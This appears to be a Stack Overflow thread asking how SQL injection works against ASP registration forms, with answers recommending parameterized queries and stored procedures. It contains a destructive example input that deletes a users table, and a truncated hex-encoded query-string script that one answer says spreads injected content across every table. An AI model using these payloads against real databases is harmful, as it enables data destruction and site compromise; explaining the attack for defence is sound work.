# SQL injection attack on ASP registration form pages?

Tags: asp.net, sql, asp-classic, sql-injection

I need to know the process of the SQL injection attack on registration form made by ASP or ASP.Net?

Comment: Please elaborate and clarify. Language? Platform? Database?

Answer (score 5):

here is a simple example:

screen input:

```
enter your name:  Bill'); delete from users --
```

build query

```
insert into users (name) values ('''+@Name+''')'
```

actual query:

```
insert into users (name) values ('Bill'); delete from users --')
```

what happens: all your users get deleted

FYI, not sure of the database you're using, but @Name is a variable, and "--" is a comment

Answer (score 1):

See [How to avoid SQL Injection in ASP.net application](https://stackoverflow.com/questions/305044/how-to-avoid-sql-injection-in-asp-net-application)

Answer (score 0):

Always validate the SQL query, remove any unwanted characters and use SQL Parameters to avoid SQL Injection.

Answer (score 0):

Use stored procedures to avoid SQL injection, also use Server.HtmlEncode(string input)

Answer (score 0):

SQL Injection Attack is the process of injecting SQL into an User Interface Element, which will subsequently get executed on the back end SQL server causing undesired behaviour. [Click here for an article, that explains SQL Injection Attack with an example.](http://venkataspinterview.blogspot.com/2011/07/what-is-sql-injection-attack.html/) Simply use stored procedures or parameterized queries to solve SQL Injection Attack.

Comment: Explain more, not only give a link

Answer (score 0):

Attacker not only crack the SQL Queries from forms but also they use the querystring or past method in ASP, their software can findout the pages that use the values from Querystring. Attacker add their script in that url and when website site page code get the value from querystring and there is no check to validate the value. All the script pass to database for execution. The Script used in url is in hexadecimal format and it will be in executable format when you run this statement in query anaylser. Don't RUN THIS SCRIPT on LIVE DATABASE, To do this make a dummy database and then execute it otherwise your database will be infected.

Those statements make the cusrors that fetch all the tables of a databse and then all columns of table to spread the Injection. +declare+%40s+varchar%288000%29+set+%40s%3Dcast%280x73657420616e73695f7761726e696e6773206f6666204445434c415245204054205641524348415228323535292c404320564152434841522832353529204445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e5441424c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f5343484
 [detail link](http://www.infoa2z.com/sqlserver/how-attackers-make-sql-injection-attack,-what-script-they-used-for-sql-injection)

Comment: Thanks for posting your answer! Please be sure to read the [FAQ on Self-Promotion](http://stackoverflow.com/faq#promotion) carefully. Also note that it is *required* that you post a disclaimer every time you link to your own site/product.